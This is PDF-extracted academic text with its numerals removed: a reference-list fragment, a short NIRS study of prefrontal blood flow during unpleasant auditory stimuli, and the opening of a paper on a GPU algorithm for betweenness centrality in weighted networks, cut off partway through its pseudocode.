/j.marpolbul. . . http://dx.doi.org/ . /s - ( ) - https://mapbox.github.io/rasterio/ http://dx.doi.org/ . /j.bpj. . . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /j.ecolind. . . http://dx.doi.org/ . /j.ocecoaman. . . http://dx.doi.org/ . /j.marpol. . . https://www.qgis.org/ http://dx.doi.org/ . / a http://dx.doi.org/ . /j.marpol. . . http://dx.doi.org/ . /jors. http://dx.doi.org/ . /peerj-cs. van der walt s, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science engineering : – doi . /mcse. . . warmerdam f. . the geospatial data abstraction library. in: hall gb, leahy mg, eds. open source approaches in spatial data handling. berlin, heidelberg: springer berlin heidelberg, – doi . / - - - - _ . white c, halpern bs, kappel cv. . ecosystem service tradeoff analysis reveals the value of marine spatial planning for multiple ocean uses. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. your paper's title starts here: please center measurement of brain activity related to unpleasant emotion in the prefrontal cortex region using nirs haruki kawanaka, atsushi nagase, koji oguri graduate school of information science and technology, aichi prefectural university, japan, kawanaka@ist.aichi-pu.ac.jp abstract. we measured noninvasively a response of blood flow (hemoglobin concentration) in the prefrontal cortex area caused by emotional unpleasant arousal using the near-infrared spectroscopy (nirs). nirs can be easily measured brain activity in comparison with other measurement methods. and it has the advantage of low load for subjects. in this study, auditory stimuli applied to subjects in order to arouse unpleasant emotions, changes in blood flow were measured at that time. as a result, we have confirmed a significant increase of the oxygenated hemoglobin concentration in the peripheral cortex (brodmann area ) caused by the emotional unpleasant associated. and, the effectiveness of nirs in measuring the brain activity related to emotional was demonstrated. keywords: near-infrared spectroscopy, unpleasant emotion, prefrontal cortex, auditory stimuli, brain activity . introduction an emotion is one of the important functions of the brain. the emotion has various types of fear, anger, joy and so on. in this study we have differentiated in pleasant and unpleasant emotion. it have been known that humans and other animals take approach behavior to the preferred things (ex. foods) for themselves, while escape behavior and aggressive behavior to angered, feared or unpleasant things (ex. predators and dangers). the former is known as positive emotional behavior, and the latter is negative emotional behavior. the brain activities which cause these behaviors are called positive (pleasant, comfort) and negative (unpleasant, discomfort) emotion. it is becoming clear that the limbic system structures including the amygdala have an important role in the expression of emotions. and the relationship between emotion and the prefrontal cortex which is located in front of the frontal lobe have been reported. in recent years, non-invasive measurement of brain activity has elucidated many aspects of brain function. near- infrared spectroscopy (nirs) is a non-invasive measurement technique using near-infrared light to measure changes of brain activity, especially the blood flow (hemoglobin concentration) in cortical areas. nirs is low load for the subjects and has the advantage of being easy to measure in comparison with functional magnetic resonance imaging (fmri) and positron emission tomography (pet). for example, fmri and pet measurements must continue to maintain a supine posture with a sense of stagnation within the device. also, fmri has the noise of the device and pet has the possibility of radiation exposure due to radioactive solution injected into the body. so, if you measure emotion-related brain activity using pet and fmri, emotions of the subject could be affected by the measurement itself. nirs of low load compared with those methods are more suitable method to measure brain activities related to emotions. in this study, we focus on unpleasant emotions, and analyze blood flow changes measured by nirs in the prefrontal cortex area related to emotional unpleasant evoked by auditory stimuli. . unpleasant emotion a. emotion and prefrontal cortex. amygdala in the limbic system is one of the most important structure on emotion, which is considered that is involved in the expression of pleasure or unpleasant emotion based on valuation and meaning to stimuli. in previous research on emotion-related brain activity measurements, brain activities when sensory stimulus was applied have been measured by pet or fmri. zald et al. have performed to measure a brain activity using pet and reported the activity in the amygdala which is associated with unpleasant emotions evoked by auditory stimulus. in addition to the limbic system, it is believed that prefrontal cortex relates to emotion. it is thought that prefrontal cortex has close fibrous contacts with the structure, such as the amygdala and plays a key role in emotion and motivation. and it has been reported that prefrontal cortex works to control or cooperate with the limbic system. thus, the prefrontal cortex is closely related to the area involved in the expression of emotion, such as the limbic system. nirs can capture the reaction of blood flow associated with emotion by measuring at the prefrontal cortex. b. auditory stimuli to evoke unpleasant emotion. visual stimuli, auditory stimuli or olfactory stimuli have been generally used as stimulus to evoke emotional. auditory stimuli can be applied easily and continuously, and elicit an emotional arousal whose individual differences are small. therefore, in this study we use auditory stimulus as sensory stimulation to evoke emotion, in particular unpleasant emotions. a preliminary experiment was conducted to determine the auditory stimuli which can effectively evoke unpleasant emotion. a white noise and seven sine waves with different frequencies were used as auditory stimuli. the sine waves frequency are [hz], [hz], [hz], [khz], [khz], [khz], [khz]. the healthy subjects listened to auditory stimuli for seconds, judged pleasant/unpleasant on a scale of - to ('- ' corresponds to the most unpleasant, ' ' the most pleasant). fig. . is the result which shows the average and standard deviation of the judgments of all subjects. when a sine wave was present, the average grade has been generally negative. subjects responded to the unpleasant at almost sine waves. the more the frequency increases, the more the unpleasant degree increases. in particular, [khz] has the lowest average grade - . and the standard deviation is small compared to other. on the other hand, the average grade of [hz] sine wave is - . , and it is close to zero. in other words, [hz] sine wave is an auditory stimulus which there is very little effect to evoke unpleasant emotion. white noise has average grade - . , it shows white noise tends to evoke unpleasant emotion. white noise has been used as a control stimulus which can't evoke both pleasant and unpleasant emotions in a previous study [ ]. however, using white noise as a control stimulus is not reasonable. in this study, we use [khz] sine wave as an auditory stimuli to evoke unpleasant emotion (unpleasant stimulus), and [hz] sine wave as control stimulus. fig. ratings of pleasant vs. unpleasant . measurement and analysis methods in nirs a. nirs (near-infrared spectroscopy). near-infrared spectroscopy is one of the brain activity measurement techniques which quantify the blood flow changes (hemoglobin concentration) in cortical areas using near-infrared light which is high permeability to the body. near-infrared light irradiated from the optical transmission fiber reaches to the cerebral cortex while being diffused and absorbed at the scalp, skull and cerebrospinal fluid. the amount of the transmitted light came back again on the scalp from the cortex is measured by receiving fiber. in a bloodstream, ther e are two kinds of hemoglobin i.e. oxygenated hemoglobin (oxy-hb) and deoxygenated hemoglobin (deoxy-hb). oxy-hb and deoxy-hb absorption spectrum is different, so it is possible to calculate the concentration of each hemoglobin based on the amount of transmitted light. when the blood vessels expand in association with the neural activity, arterial blood which includes rich glucose and oxygen as an energy source is adjusted. such adjustment mechanism is called neuro-vascular coupling and known as a regional cerebral blood flow (rcbf) increases by this mechanism. thus, the increase of rcbf means an existence of neural activity in the region [ ]. and if rcbf has been increased, oxy-hb increases and deoxy-hb decreases in the venous capillary. we can obtain the concentration of hemoglobin in the capillaries of the cortical areas from the nirs signal. nirs signal where the concentration of oxy-hb increases and the concentration of deoxy-hb decreases show that neural activity has occurred around the area. b. measuring method. four healthy male subjects which were - years old (average . ) were conducted with informed consent and participated in experiments. as shown in fig. , one trial was set as a series of a rest for seconds (former rest), an infliction of auditory stimuli for -second (task) and a rest for seconds (latter rest). each subject was instructed to gaze onto '+' sign on a screen in front of him in the sitting posture during the trial, to empty his mind at both rests, and to focus on auditory stimuli at the task. also, the experimental laboratory was kept dark to prevent subjects from distraction. fig. time sequence of a trial fig. optical fibers and channels the unpleasant emotional stimulus and the control stimulus were inflicted through earphones attached to the both ears of the subject. optical brain function imaging was foire- (shimadzu). the sampling frequency of oxy-hb and deoxy-hb concentrations was [hz]. in order to measure prefrontal cortex region, optical transmit and receive fiber were attached to the forehead of the subject. as shown in fig. , channels were measured in all. the channel and channel are corresponding to fp and fp in international - method. the data signals of trials for each stimulus were obtained by using nirs one by one. the existence of the evocation of emotional discomfort of the subject was confirmed per trials. c. analysis method. ) step : pretreatment. the raw signal has been measured by nirs is shown in fig. (a). it is the hemoglobin concentration change of channel during trails for the unpleasant emotional stimulus. the solid line corresponds to oxy-hb concentration, dashed line to deoxy-hb concentration in fig. . because it contains artifacts such as noise and pulse rate variability in the original signal, a removal processing performed using th-order butterworth low pass filter of . [hz]. in addition, the nirs signal has been known to change the baseline [ ]. to reduce the variation of this baseline, the baseline correction was given on the basis of the former rest of each trial. the baseline correction was performed by taking the difference between xn(t) (raw data at time t in n -th trial) and xn (average at the former rest in n- th trial). bn (t )= xn(t )− x̄n ( ) where, let bn(t) be the value after baseline correction. fig. (b) shows nirs signal after the preprocessing. (a) (b) fig. orignal signals of nirs and denoise signals after preprocessing ) step : averaging. averaging is often used to detect the changes in hemoglobin concentration by the type of task. because averaging improves the s/n ratio, we can efficiently get the components related to the task. in addition, we performed grand averaging from data of all subjects by the type of task. however, if the grand averaging waveform is directly obtained from all subjects' data then it is difficult to analyze because of differences in trends for each subject. thus, the grand averaging was calculated for each subject after normalizing preprocessed signals by z-score such that the average value of the former rest of all the trials for each subject is and the standard deviation is (eq. ). z ( t )= { x (t )− x̄ f }/σ f ( ) where, let xf be the average hemoglobin concentration in the former rest, σf be the standard deviation of the former rest. the change in hemoglobin concentration of the former rest is reflected in neural activity at rest, we can be compared between subjects by normalizing based on changes in former rest. ) step : statistical analysis. in general, measurements of brain activity using fmri and pet have been judged the presence and intensity of brain activity by statistical analysis. in this study, student's t-test for changes of hemoglobin concentration was performed using welch's t-test in accordance with the previous study [ ]. also, the visualization image was created by mapping based on t-value and two-dimensional interpolation using the inverse distance weighted. . results and discussion fig. shows the result measured at channel in the case of the control stimulus, fig. shows in the case of the unpleasant emotional stimulus. regardless of whether the stimulus was unpleasant, oxy-hb concentration began to increase shortly after start of task, to decline before the end of the task. on the other hand, deoxy-hb concentration has been decreasing from the start of the task. generally, since rcbf increases in association with the neural activity by neuro-vascular coupling, nirs signal at the area has a tendency to increase in oxy-hb concentration and to decrease in deoxy-hb concentration. averaged waveforms show changes of hemoglobin concentration related in the neural activity. the oxygen consumption and glucose metabolism increases at neuron cell by the neural activity, accordingly cerebral blood flow begins to increase after an interval of about three seconds [ ]. the average waveform of oxy-hb concentration which was obtained in this study shows increase from after a few seconds of stimulus in the same way. in the control stimulus versus the unpleasant emotional stimulus, the degree of increase in the concentration of oxy- hb at the case of the unpleasant emotional stimulus is larger. this is presumed that the control stimulus evokes neural activity related to only the perception of auditory stimuli, and the unpleasant emotional stimulus caused neural activity related to not only the perception of stimuli but also the evoked emotion. fig. shows the grand averaging waveform of oxy-hb concentration at every channel. the oxy-hb concentration waveform for the unpleasant emotional stimulus significantly increased at almost channels. in addition, oxy-hb concentration for the control stimulus is increased at latter rest section of several channels. in order to compare the change of oxy-hb concentration when auditory stimuli were applied, we evaluated the mean values for the former rest and the task in each trial by t-test. fig. shows the comparison between the former rest and the task of the control stimulus, and fig. shows the former rest and the task of the unpleasant emotional stimulus. the mark '*' in the figures indicates p < . significance level, the mark '**' indicates p < . significance level that the channel confirmed a significant increase in oxy-hb concentration. fig. averaging waveforms unpleasant emotional stimulus presentation at ch fig. averaging waveforms for control stimulus presentation at ch fig. averaging waveforms of oxy-hb concentration in all channels fig. visualization of t-values obtained by comparison of oxy-hb conc. during control stimulus and rest fig. visualization of t-values obtained by comparison of oxy-hb conc. during unpleasant emotional stimulus and rest in the case of the control stimulus, the concentration of oxy-hb significantly increased with p < . significance level at channel and p < . significance level at channel , and . the oxy-hb concentration had positive t- value on the whole and tended to increase. especially, markedly increase was observed in the lower part of measurement area. in the case of the unpleasant emotional stimulus, a significant increase in concentration of oxy-hb was observed with p < . significance level at the overall measured area. as described above, the neural activity associated with both the evocation of unpleasant emotion and the perception of auditory stimuli is thought to be the cause of that. in order to compare the change of oxy-hb concentration when the unpleasant emotional stimuli were inflicted, we evaluated the mean values for the task of the unpleasant emotional stimulus and the task of the control stimulus in each trial by t-test. fig. shows the comparison of oxy- hb concentration between the unpleasant emotional stimulus and the control stimulus. the concentration of oxy-hb significantly increased with p < . significance level at channel and and p < . significance level at channel , , and . in addition, oxy-hb concentration significantly decreased with p < . significance level at channel . especially, markedly increase was observed in the upper part of measurement area. fig. visualization of t-values obtained by comparison of oxy-hb conc. during unpleasant emotional stimulus and control stimulus . conclusions in this study, we non-invasively measured blood flows in prefrontal cortex by using nirs while the auditory stimulus was inflicted. [khz] sine wave was inflicted to the subjects as an unpleasant emotional stimulus. similarly [hz] sine wave was as a control stimulus. as a result of comparison between the control stimulus and the unpleasant emotional stimulus, significantly increase of oxy-hb concentration was found in the periphery of brodmann's area . the blood flow response associated with unpleasant emotion has been obtained using nirs. therefore, it was suggested that nirs has the effectiveness of measuring a brain activity related emotion with low load for subjects. future work is the nirs measurements in a variety of emotions to be applied to brain machine interface. . acknowledgment a part of this research is supported by a grant from the artificial intelligence research promotion foundation (no. - ). references [ ] m. jueptner and c. weiller, “does measurement of regional cerebral blood flow reflect synaptic activity? - implications for pet and fmri”, neuroimage, vol. , no. , pp. - , [ ] d.h. zald and j.v. pardo, “the neural correlates of aversive auditory stimulation”, neuroimage, vol. , pp. - , [ ] b. chance, z. zhuang, c. unah, c. alter and l. lipton, “cognition-activated low-frequency modulation of light absorption in human brain”, proc.natl.acad.sci.usa, vol. , no. , pp. - , [ ] p.a. bandettini, e.c. wong, r.s. hinks, r.s. tikofsky and j.s. hyde, “time course epi of human brain function during task activation”, magnetic resonance in medicine, vol. , issue , pp. - , [ ] w. niide, t. tsubone, y. wada, “discrimination of moving limb by near infrared spectroscopic measurement of brain activation”, transaction of ieice, vol.j -d, no. , pp. - , a gpu-based solution for fast calculation of the betweenness centrality in large weighted networks a gpu-based solution for fast calculation of the betweenness centrality in large weighted networks rui fan , ke xu and jichang zhao state key laboratory of software development environment, beihang university, beijing, pr china school of economics and management, beihang university, beijing, pr china abstract betweenness, a widely employed centrality measure in network science, is a decent proxy for investigating network loads and rankings. however, its extremely high computational cost greatly hinders its applicability in large networks. although several parallel algorithms have been presented to reduce its calculation cost for unweighted networks, a fast solution for weighted networks, which are commonly encountered in many realistic applications, is still lacking. in this study, we develop an efficient parallel gpu-based approach to boost the calculation of the betweenness centrality (bc) for large weighted networks. we parallelize the traditional dijkstra algorithm by selecting more than one frontier vertex each time and then inspecting the frontier vertices simultaneously. by combining the parallel sssp algorithm with the parallel bc framework, our gpu-based betweenness algorithm achieves much better performance than its cpu counterparts. moreover, to further improve performance, we integrate the work-efficient strategy, and to address the load- imbalance problem, we introduce a warp-centric technique, which assigns many threads rather than one to a single frontier vertex. experiments on both realistic and synthetic networks demonstrate the efficiency of our solution, which achieves . � to . � speedups over the parallel cpu implementation. our algorithm is open-source and free to the community; it is publicly available through https://dx.doi.org/ . /m .figshare. . considering the pervasive deployment and declining price of gpus in personal computers and servers, our solution will offer unprecedented opportunities for exploring betweenness-related problems and will motivate follow-up efforts in network science. subjects distributed and parallel computing, network science and online social networks keywords parallel computing, gpu computing, betweenness centrality, weighted networks introduction as an emerging multidisciplinary research area, network science has attracted much attention from researchers of various backgrounds, such as computer science, biology and physics, in recent decades. in these contributions, the betweenness centrality (bc) is often applied as a critical metric for measuring the significance of nodes or edges (ma & sayama, ; freeman, ; barthélemy, ; abedi & gheisari, ; goh et al., ). for example, girvan and newman developed a community detection algorithm based on edge bc (girvan & newman, ), leydesdorff ( ) used centrality as an indicator of the interdisciplinarity of scientific journals and motter & lai ( ) established a model how to cite this article fan et al. ( ), a gpu-based solution for fast calculation of the betweenness centrality in large weighted networks. peerj comput. sci. :e ; doi . /peerj-cs. submitted august accepted november published december corresponding author jichang zhao, jichang@buaa.edu.cn academic editor john owens additional information and declarations can be found on page doi . /peerj-cs. copyright fan et al. distributed under creative commons cc-by . https://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. mailto:jichang@�buaa.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ of cascading failures in which the load on a node is represented by its betweenness. however, the extremely high temporal and spatial complexity of the bc calculation greatly limits its applicability in large networks. before the landmark work of brandes ( ), the complexity of the algorithm for computing the bc was o(n ) in time and o(n ) in space. brandes ( ) reduced the complexity to o(n + m) in space and o(nm) and o(nm + n log n) in time for unweighted and weighted networks, respectively, where n is the number of vertices and m is the number of edges. however, this improved algorithm still cannot satisfy the requirements for scientific computations in the present era of information explosion, as an increasing number of unexpectedly large networks emerge, such as online social networks, gene networks and collaboration networks. for example, twitter has hundreds of millions of active users, who form an enormous online social network. however, calculating the bc of a weighted network with one million nodes may take approximately one year, which is an unsupportable time cost. existing parallel cpu algorithms may reduce this time to several months; however, this is still too expensive. because of this problem, there is a pressing need to develop faster bc algorithms for the exploration of diverse domains. general-purpose gpu (gpgpu) computing, which has high parallelization, provides an opportunity to employ parallel algorithms implemented on gpus to achieve better performance. for network-related problems, researchers have devoted efforts to conquering irregular graph structures using gpgpu techniques and have achieved higher performance than is possible with traditional sequential cpu algorithms (mitchell & frank, ; merrill, garland & grimshaw, ; wang et al., ; harish & narayanan, ; cong & bader, ). cuda, developed by nvidia corporation, is the most popular gpu computing framework, and some researchers have even used this framework to parallelize the brandes algorithm (shi & zhang, ; sariyüce et al., ; mclaughlin & bader, , ). however, previous works have concentrated on unweighted networks for simplicity, although to the best of our knowledge, many realistic networks are weighted ones. the most significant difference in the bc algorithm between unweighted and weighted networks is the shortest-path calculation. in weighted networks, the dijkstra algorithm should be used to solve the single-source shortest path (sssp) problem rather than the breadth-first search (bfs) algorithm. in previous work, many efforts have been devoted to developing a gpu version of the sssp problem using the well-known dijkstra algorithm (martin, torres & gavilanes, ; ortega-arranz et al., ; delling et al., ; davidson et al., ). although such algorithms have been successfully developed and presented, establishing a parallel version of the bc algorithm for weighted networks is nontrivial because the original sssp algorithm must be modified in many critical aspects for this task, and to the best of our knowledge, a suitable fast solution is still lacking. with the aim of filling this vital gap, we propose a fast solution using cuda for calculating the bc in large weighted networks based on previous gpu bc algorithms and sssp algorithms. to make our algorithm more efficient, we make efforts to optimize it by employing several novel techniques to overcome the influence of irregular network structures. real-world networks have many characteristics that can degrade the performance of fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gpu parallelization algorithms. for example, the frontier set of nodes is always small compared with the total number of vertices, especially for networks with large diameters. at the same time, the majority of the nodes do not need to be inspected in each step; hence, processing all vertices simultaneously, as is done in traditional algorithms, is wasteful. mclaughlin & bader ( ) proposed a work-efficient strategy to overcome this problem. another well-known issue is that the power-law degree distribution in realistic networks induces severe load imbalance. several methods have been proposed in previous studies to overcome this problem; e.g., jia et al. ( ) employed an edge parallel strategy to avoid load imbalance, and hong et al. ( ) addressed this problem by using a warp technique. in this paper, we systematically investigate the advantages and disadvantages of these previous methods and incorporate them into our algorithm to solve the above two problems. experiments on both real-world and synthetic networks demonstrate that our algorithm significantly outperforms the baseline gpu algorithm. our main contributions are as follows: � based on previous gpu-based parallel sssp and bc algorithms, we propose an efficient algorithm for calculating the bc for weighted networks, which achieves . � to . � speedups over the parallel cpu algorithm on realistic networks. � we compare the traditional node-parallel method with the work-efficient version and the warp-centric method. experiments on realistic networks and synthetic networks demonstrate that the combination of these two strategies performs better than either the basic node-parallel method or the individual strategies; it achieves an average speedup of . � over the baseline method on realistic networks. � we package our algorithm as a useful tool that can be used to calculate both node and edge bc on weighted networks. researchers can apply this tool to quickly and conveniently calculate bc values for weighted networks, especially large networks. the source code is publicly available through https://dx.doi.org/ . /m .figshare. . background first, we briefly introduce the well-known brandes algorithm and dijkstra algorithm based on preliminary definitions of a network and the bc. brandes algorithm a graph can be denoted by g(v, e), where v is the set of vertices and e is the set of edges. an edge can be denoted by (u, v, w), which means that there is a link of weight w connecting nodes u and v. if edge (u, v) exists, it can be traversed either from u to v or from v to u because we focus only on undirected graphs in this paper. for directed graphs, if only an edge (u, v) exists, then the algorithm will store only the edge (u, v) and will process only this edge when inspecting vertex u; it will ignore (v, u) when inspecting vertex v. thus, our algorithm can easily be extended to directed graphs. a path p = (s, : : : , t) is defined as a sequence of vertices connected by edges, where s is the starting node and t is the ending node. the length of p is the sum of the weights of the edges contained in p. d(s, t) is the distance between s and t, which is the length of the shortest path fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ connecting s and t. sst denotes the number of shortest paths from s to t. in accordance with these definitions, we have d(s, s) = , sss = , d(s, t) = d(t, s) and sst = sts for an undirected graph. sst(v) denotes the number of shortest paths from s to t that include v. based on these definitions, the bc can be defined as: cbðvÞ¼ x s ¼v ¼t v �stðvÞ �st : ( ) from the above definitions, the calculation of the bc can be naturally separated into the following two steps: . compute d(s, t) and sst for all node pairs (s, t). . sum all pair dependencies. here, a pair dependency is defined as �stðvÞ¼ �stðvÞ�st . the time complexity of the first step is o(mn) or o(mn + n log n) for an unweighted graph or a weighted graph, respectively; therefore, the bottleneck of this algorithm is the second step, which has a time complexity of o(n ). brandes developed a more efficient bc algorithm with a time complexity of o(mn) for unweighted graphs and o(mn + n log n) for weighted graphs. the critical point is that the dependency of a node v for a source node s is �sðvÞ¼ p u:v psðuÞ �sv �su ð þ �sðuÞÞ. by applying this equation, we can accumulate the dependencies after computing the distances and numbers of shortest paths only from the source vertex s to all other vertices, rather than after computing the shortest paths for all pairs. we can easily develop a parallel version of the brandes algorithm for unweighted graphs because the graph is always traversed as a tree using the bfs algorithm. given a source node s, the root of the tree is s, and the tree is produced using the bfs method in the first step. in the second step, dependencies related to the source node s are calculated from the leaves to the root of the tree, and nodes at the same level are isolated and have no influence on each other. as a result, the parallel version of the algorithm can simultaneously explore all nodes at the same level in both steps, thereby fundamentally accelerating the bc calculation. dijkstra algorithm the dijkstra algorithm (dijkstra, ) and the floyd–warshall algorithm (floyd, ) are commonly employed to solve shortest-path problems. the dijkstra algorithm is more easily adaptable to the bc problem because the brandes algorithm accumulates dependencies after computing sssps rather than after finding and storing the shortest paths for all pairs. the dijkstra algorithm applies a greedy strategy to solve the sssp problem. in this algorithm, the source node is s, and once the shortest path from s to another node u is found, u will be settled. as seen in algorithm , all nodes in graph g are separated into two sets: the settled vertices and the unsettled vertices q. an array d is used to store tentative distances from s to all nodes. initially, q stores all nodes, d(s) = , and d(u) = ∞ for all other nodes (lines – ). during iteration (lines – ), the node u with fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the shortest tentative distance d[u] (denoted by extract_min(q)) is selected and settled, which means that the shortest path to node u is found and d[u] is set to the corresponding value. then, for each node v ∈ neighbors(u), if d[u] + w(u, v) < d[v], d[v] will be updated to d[u] + w(u, v). the above procedures, in which one node is settled and the tentative distances of its neighbors are then updated, are repeated until q is empty, i.e., until all nodes in graph g have been settled. according to the above description, the dijkstra algorithm has no parallel characteristics because it selects one frontier node in each iteration. however, this restriction can be loosened to allow several frontier vertices to be explored simultaneously, in a manner similar to the bfs parallel approach. related work graph traversal strategies for unweighted networks, the brandes algorithm applies the traditional bfs strategy in the shortest-path step. the bfs algorithm produces a traversal tree, which can later be used in the dependency accumulation step. this behavior makes it easy to parallelize both steps of the unweighted bc algorithm; i.e., threads are assigned to all vertices in the graph, and if a vertex is in the frontier set, the relevant thread traverses all edges connected to that vertex. jia et al. ( ) implemented their bc algorithm based on this node-parallel traversal strategy. however, this simple strategy induces a problem of load imbalance since the degrees of different vertices varies, especially in scale-free networks. threads processing low-degree vertices must wait for threads processing high-degree vertices, which significantly slows down the calculation. instead of assigning threads to all vertices, jia et al. ( ) proposed an edge-parallel strategy in which threads are assigned to all edges and edges that are connected to frontier vertices are then inspected. this technique eliminates the load-imbalance problem. jia et al. applied both coarse-grained and fine- grained parallelism. in a modern gpu, the kernel can employ multiple blocks, and each block contains multiple threads. in their program, the gpu employs multiple blocks, each of which focuses on one root vertex s (coarse-grained parallelism). the threads within each block work cooperatively to traverse the edges in both the sssp step and the dependency accumulation step (fine-grained parallelism). as a result, in each block, algorithm sequential dijkstra algorithm. : q ) empty set : for v ∈ v do : d[v] ) ∞ : add v to q : d[s] ) : while q is not empty do : u ) extract_min(q) : for v ∈ neighbors(u) do : d[v] ) d[u] + weightuv fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the dependencies of all vertices related to s are covered. for a vertex w, the dependency for the root vertex s is denoted by �s[w]. based on the brandes algorithm, the betweenness of w can be calculated as p s ¼w v �s½w�. work-efficient technique in the edge- and node-parallel strategies, threads are assigned to all vertices or edges, respectively, and the algorithm then checks whether the vertices and edges need to be inspected; this incurs a considerable unnecessary cost because the frontier nodes might be small in size, especially for graphs of large diameters. to address this problem, mclaughlin & bader ( , ) proposed an excellent work-efficient technique. in this method, a queue qcurr that stores the frontier vertices is maintained, and threads are assigned only to vertices that are in qcurr. in the bfs procedure, new frontier nodes are added to qnext. after the bfs step, the vertices in qnext are transferred to qcurr, and qnext becomes an empty queue. to implement this technique, it is necessary to know the lengths of both queues (qcurr_len and qnext_len) because qcurr and qnext are implemented using arrays in the gpu kernel code. for the parallel bc algorithm proposed in this paper, we develop a work-efficient version of the algorithm based on this idea. the issue of load-imbalance the work-efficient algorithm still suffers from the load-imbalance problem since it is based on the node-parallel strategy. in addition to the edge-parallel strategy, other techniques have also been developed to solve this problem (davidson et al., ; hong et al., ). hong et al. proposed the warp-centric concept, in which a warp rather than a thread is allocated to each node. in the modern cuda framework, a warp consists of threads, which act as a single instruction multiple data (simd) unit. because a group of threads is assigned to a single frontier vertex, each thread processes a subset of the edges connected to that vertex. as a result, each thread does less work for high-degree nodes, thereby greatly reducing the waiting time. other techniques for addressing the load-imbalance problem include cooperative blocks, cta + warp + scan and load-balanced partitioning (davidson et al., ; wang et al., ). these methods attempt to assign threads to edges that need to be inspected by means of the design of several novel data structures and algorithms, which ensure excellent within-block and interblock load balance. however, these techniques require blocks to work cooperatively; i.e., each block must process several vertices or edges. our bc algorithm applies both coarse-grained and fine-grained approaches. for this reason, we apply the warp-centric technique in our algorithm to address the load-imbalance problem. parallel sssp algorithm to compute the bc on a weighted network, a parallel sssp algorithm is applied in the shortest-path step. the dijkstra algorithm, the traditional method of solving this problem, is inherently sequential because it selects a single frontier vertex in each iteration. the bellman–ford algorithm is easier to parallelize, but it suffers from rather low efficiency compared with the dijkstra algorithm. martin, torres & gavilanes ( ) fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ proposed a parallel dijkstra algorithm, in which all vertices with the minimum tentative distance are inserted into the frontier set and the vertices in the frontier set are then processed simultaneously. ortega-arranz et al. ( ) implemented a more aggressive algorithm. they loosened the condition for selecting frontier nodes, resulting in more than one frontier node in each iteration, to achieve higher parallelism. d-stepping is another frequently employed parallel sssp algorithm, in which vertices are grouped into buckets and all vertices in a bucket are processed simultaneously. however, as described in davidson et al. ( ), there are three main characteristics that make �-stepping difficult to implement efficiently on a gpu; e.g., it requires dynamic arrays, which are poorly supported in the cuda framework. because of this, we base our sssp algorithm on the parallel dijkstra algorithm. however, previous sssp algorithms have focused only on the values of the shortest paths, neglecting the number of shortest paths, which is also necessary for the bc calculation. in this paper, we modify the parallel dijkstra algorithm presented in ortega-arranz et al. ( ) to combine it smoothly with our bc algorithm for weighted graphs. gpu-based algorithm our gpu-based bc algorithm for weighted graphs applies both coarse-grained (in which one block processes one root vertex s) and fine-grained (in which all threads in a block compute the shortest paths and dependencies related to s) parallel strategies. in a block, the shortest paths and dependencies corresponding to the root vertex processed by that block are calculated using brandes’s two-step framework. in the shortest-path step, we build a multi-level structure from root to leaves by relaxing the condition that a single frontier node is selected in each iteration and then calculating the distances and numbers of shortest paths for all selected frontier nodes simultaneously. in the dependency accumulation step, the multi-level structure built in the first step is re-employed to calculate the dependencies of the vertices from the leaves to the root of the multi-level structure. calculations for vertices at the same level are performed simultaneously. parallel bc algorithm in this section, we introduce the details of our gpu version of the bc algorithm for weighted graphs. first, we apply the compressed sparse row (csr) format, which is widely used in graph algorithms, to store the input graph (bell & garland, ; davidson et al., ). this format is space efficient because both a vertex and an edge consume one entry, and it is convenient for performing the traversal task on a gpu. moreover, edges related to the same vertex are stored consecutively in memory, which makes the warp-centric technique more efficient. for the storage of weighted graphs, an additional array is required to store the weights of all edges. we apply both coarse-grained and fine-grained parallel strategies. the pseudo-code presented in this paper describes the parallel procedure for threads within a block. algorithm shows the initialization of the required variables. u and f represent the unsettled set and the frontier set, respectively. v is unsettled if u[v] = and is a frontier fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ node if f[v] = . d represents the tentative distance, and s[v] is the number of shortest paths from s to v. d[v] stores the dependencies of v. lock stores locks for all nodes to avoid race conditions. if lock[v] = , changing neither s[v] nor d[v] is permitted (see the next section for details). vertices at the same level are consecutively recorded in s, and the start (or end) point of each level in s is stored in ends. in other words, s and ends record the levels of traversal in the csr format; they are used in the dependency accumulation step. as seen in algorithm , in the dependency accumulation step, we obtain all nodes at the same level from s and ends and accumulate the dependencies of these nodes simultaneously. note that in algorithm , we assign threads only to nodes that need to be inspected rather than to all nodes, which enhances the efficiency of the algorithm by avoiding redundant threads. we update the dependencies of edges in line of algorithm if edge betweenness is required. parallel dijkstra algorithm the parallel version of the bfs procedure that is applied in the bc algorithm for unweighted networks can be naturally adapted from the sequential version because vertices located on the same level in the bfs tree can be inspected simultaneously. moreover, in the dependency accumulation step (step two), dependencies are calculated from low-level vertices (nodes with the greatest depths in the tree) to high-level vertices (nodes that are close to the source node), and calculations for nodes at the same level are again performed simultaneously. in the weighted version, a multi-level structure is similarly necessary in the dependency accumulation step to achieve parallelization. as seen in fig. a, this structure should satisfy the condition ∀ u ∈ pv, lu < lv, where li denotes algorithm bc: variable initialization. : for v ∈ v do in parallel : u[v] ) : f[v] ) : d[v] ) ∞ : s[v] ) : d[v] ) : lock[v] ) : ends[v] ) : s[v] ) : d[s] ) : s[s] ) : 